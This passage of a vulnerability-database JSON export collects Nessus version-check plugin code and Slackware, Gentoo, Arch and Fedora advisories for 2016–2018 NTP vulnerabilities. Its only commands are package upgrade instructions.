issues.", "edition": 25, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-03-02T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : ntp (SSA:2018-060-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:ntp", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2018-060-02.NASL", "href": "https://www.tenable.com/plugins/nessus/107103", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-060-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107103);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_xref(name:\"SSA\", value:\"2018-060-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : ntp (SSA:2018-060-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ntp packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.511203\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88e126a0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the 
affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, 
extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-01T03:07:22", "description": "The remote host is affected by the vulnerability described in GLSA-201805-12\n(NTP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in NTP. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code or cause a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-29T00:00:00", "title": "GLSA-201805-12 : NTP: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:ntp"], "id": "GENTOO_GLSA-201805-12.NASL", "href": "https://www.tenable.com/plugins/nessus/110176", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201805-12.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110176);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_xref(name:\"GLSA\", value:\"201805-12\");\n\n script_name(english:\"GLSA-201805-12 : NTP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201805-12\n(NTP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in NTP. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code or cause a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201805-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All NTP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/ntp-4.2.8_p11'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/ntp\", unaffected:make_list(\"ge 4.2.8_p11\"), vulnerable:make_list(\"lt 4.2.8_p11\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"NTP\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. 
This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "modified": "2018-03-27T19:30:28", "published": "2018-03-27T19:30:28", "id": "FEDORA:D24F26076D26", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: ntp-4.2.8p11-1.fc26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-12327", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "modified": "2018-09-26T20:17:54", "published": "2018-09-26T20:17:54", "id": "FEDORA:B80B9607548F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: ntp-4.2.8p12-1.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. 
", "modified": "2018-08-30T04:57:33", "published": "2018-08-30T04:57:33", "id": "FEDORA:D00D36075DA4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: ntp-4.2.8p12-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170", "CVE-2019-8936"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "modified": "2019-04-07T01:47:38", "published": "2019-04-07T01:47:38", "id": "FEDORA:B6F06606E5A6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: ntp-4.2.8p13-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "description": "Arch Linux Security Advisory ASA-201803-11\n==========================================\n\nSeverity: High\nDate : 2018-03-16\nCVE-ID : CVE-2016-1549 CVE-2018-7170 CVE-2018-7182 CVE-2018-7183\nCVE-2018-7184 CVE-2018-7185\nPackage : ntp\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-647\n\nSummary\n=======\n\nThe package ntp before version 4.2.8.p11-1 is vulnerable to multiple\nissues including arbitrary code execution, content spoofing and denial\nof service.\n\nResolution\n==========\n\nUpgrade to 4.2.8.p11-1.\n\n# pacman -Syu \"ntp>=4.2.8.p11-1\"\n\nThe problems have been fixed upstream in version 
4.2.8.p11.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-1549 (content spoofing)\n\nA malicious authenticated peer can create arbitrarily-many ephemeral\nassociations in order to win the clock selection algorithm in ntpd in\nNTP 4.2.8p4 and earlier and NTPsec\n3e160db8dc248a0bcb053b56a80167dc742d2b74 and\na5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim's clock.\n\n- CVE-2018-7170 (content spoofing)\n\nntpd can be vulnerable to Sybil attacks. If a system is set up to use a\ntrustedkey and if one is not using the feature introduced in\nntp-4.2.8p6 allowing an optional 4th field in the ntp.keys file to\nspecify which IPs can serve time, a malicious authenticated peer --\ni.e. one where the attacker knows the private symmetric key -- can\ncreate arbitrarily-many ephemeral associations in order to win the\nclock selection of ntpd and modify a victim's clock.\n\n- CVE-2018-7182 (denial of service)\n\nctl_getitem() is used by ntpd to process incoming mode 6 packets. A\nmalicious mode 6 packet can be sent to an ntpd instance, and if the\nntpd instance is from 4.2.8p6 thru 4.2.8p10, that will cause\nctl_getitem() to read past the end of its buffer.\n\n- CVE-2018-7183 (arbitrary code execution)\n\nntpq is a monitoring and control program for ntpd. decodearr() is an\ninternal function of ntpq that is used to -- wait for it -- decode an\narray in a response string when formatted data is being displayed. This\nis a problem in affected versions of ntpq if a maliciously-altered ntpd\nreturns an array result that will trip this bug, or if a bad actor is\nable to read an ntpq request on its way to a remote ntpd server and\nforge and send a response before the remote ntpd sends its response.\nIt's potentially possible that the malicious data could become\ninjectable/executable code.\n\n- CVE-2018-7184 (denial of service)\n\nThe fix for NtpBug2952 was incomplete, and while it fixed one problem\nit created another. 
Specifically, it drops bad packets before updating\nthe \"received\" timestamp. This means a third-party can inject a packet\nwith a zero-origin timestamp, meaning the sender wants to reset the\nassociation, and the transmit timestamp in this bogus packet will be\nsaved as the most recent \"received\" timestamp. The real remote peer\ndoes not know this value and this will disrupt the association until\nthe association resets.\n\n- CVE-2018-7185 (denial of service)\n\nThe NTP Protocol allows for both non-authenticated and authenticated\nassociations, in client/server, symmetric (peer), and several broadcast\nmodes. In addition to the basic NTP operational modes, symmetric mode\nand broadcast servers can support an interleaved mode of operation. In\nntp-4.2.8p4 a bug was inadvertently introduced into the protocol engine\nthat allows a non-authenticated zero-origin (reset) packet to reset an\nauthenticated interleaved peer association. If an attacker can send a\npacket with a zero-origin timestamp and the source IP address of the\n\"other side\" of an interleaved association, the 'victim' ntpd will\nreset its association. The attacker must continue sending these packets\nin order to maintain the disruption of the association. In ntp-4.0.0\nthru ntp-4.2.8p6, interleave mode could be entered dynamically. As of\nntp-4.2.8p7, interleaved mode must be explicitly configured/enabled.\n\nImpact\n======\n\nA remote, non-authenticated peer can cause a denial of service,\npreventing the vulnerable host from getting a correct time. 
In addition\nto that, a remote, authenticated peer can spoof the correct time,\ncausing the vulnerable host to update its clock with an invalid time.\nA malicious NTPd server, or an attacker in position of man-in-the-\nmiddle might be able to execute arbitrary code on the affected host by\nforging a response to an ntpq request.\n\nReferences\n==========\n\nhttp://support.ntp.org/bin/view/Main/NtpBug3012\nhttp://support.ntp.org/bin/view/Main/NtpBug3415\nhttp://support.ntp.org/bin/view/Main/NtpBug3412\nhttp://support.ntp.org/bin/view/Main/NtpBug3414\nhttp://support.ntp.org/bin/view/Main/NtpBug3453\nhttp://support.ntp.org/bin/view/Main/NtpBug3454\nhttps://security.archlinux.org/CVE-2016-1549\nhttps://security.archlinux.org/CVE-2018-7170\nhttps://security.archlinux.org/CVE-2018-7182\nhttps://security.archlinux.org/CVE-2018-7183\nhttps://security.archlinux.org/CVE-2018-7184\nhttps://security.archlinux.org/CVE-2018-7185", "modified": "2018-03-16T00:00:00", "published": "2018-03-16T00:00:00", "id": "ASA-201803-11", "href": "https://security.archlinux.org/ASA-201803-11", "type": "archlinux", "title": "[ASA-201803-11] ntp: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7184", "CVE-2018-7185"], "description": "New ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded.\n This release addresses five security issues in ntpd:\n * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability:\n ephemeral association attack. 
While fixed in ntp-4.2.8p7, there are\n significant additional protections for this issue in 4.2.8p11.\n Reported by Matt Van Gundy of Cisco.\n * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer\n read overrun leads to undefined behavior and information leak.\n Reported by Yihan Lian of Qihoo 360.\n * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\n ephemeral associations. Reported on the questions@ list.\n * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode\n cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat.\n * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet\n can reset authenticated interleaved association.\n Reported by Miroslav Lichvar of Red Hat.\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nb2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nd2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nc3ee95d3944b09c2e891883dc5411a6f 
n/ntp-4.2.8p11-i586-1.txz\n\nSlackware x86_64 -current package:\nfa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "modified": "2018-03-01T23:49:07", "published": "2018-03-01T23:49:07", "id": "SSA-2018-060-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.511203", "type": "slackware", "title": "[slackware-security] ntp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-10-25T16:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-12327"], "description": "New ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/ntp-4.2.8p12-i586-1_slack14.2.txz: Upgraded.\n This release improves on one security fix in ntpd:\n LOW/MEDIUM: Sec 3012: Sybil vulnerability: ephemeral association attack\n While fixed in ntp-4.2.8p7 and with significant additional protections for\n this issue in 4.2.8p11, ntp-4.2.8p12 includes a fix for an edge case in\n the new noepeer support. Originally reported by Matt Van Gundy of Cisco.\n Edge-case hole reported by Martin Burnicki of Meinberg.\n And fixes another security issue in ntpq and ntpdc:\n LOW: Sec 3505: The openhost() function used during command-line hostname\n processing by ntpq and ntpdc can write beyond its buffer limit, which\n could allow an attacker to achieve code execution or escalate to higher\n privileges via a long string as the argument for an IPv4 or IPv6\n command-line parameter. NOTE: It is unclear whether there are any common\n situations in which ntpq or ntpdc is used with a command line from an\n untrusted source. 
Reported by Fakhri Zulkifli.\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#August_2018_ntp_4_2_8p12_NTP_Rel\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12327\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p12-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p12-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p12-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p12-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p12-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p12-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p12-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p12-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n4a4cc8e4dc6964dc4521058ce776ce4e ntp-4.2.8p12-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nd3a0c36c39e1c0cf5e3b8707f948a180 ntp-4.2.8p12-x86_64-1_slack14.0.txz\n\nSlackware 14.1 
package:\n7c42e1d9fa476c162be9375a7b662654 ntp-4.2.8p12-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n75472911bb9a76a949c94aa21471f6f0 ntp-4.2.8p12-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n2ecd58c0cb1f6d035b36de9098e0d075 ntp-4.2.8p12-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n96844a4152a8dba26ed73d91662122ce ntp-4.2.8p12-x86_64-1_slack14.2.txz\n\nSlackware -current package:\ndc3f52b871f3edc1a64e2d9ef1649591 n/ntp-4.2.8p12-i586-1.txz\n\nSlackware x86_64 -current package:\necd43289b917c81e682b9b00077c1409 n/ntp-4.2.8p12-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.8p12-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "modified": "2018-08-17T17:43:28", "published": "2018-08-17T17:43:28", "id": "SSA-2018-229-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.505174", "type": "slackware", "title": "[slackware-security] ntp", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-05-28T01:37:21", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2018-7182"], "description": "### Background\n\nNTP contains software for the Network Time Protocol.\n\n### Description\n\nMultiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code or cause a Denial of Service condition. 
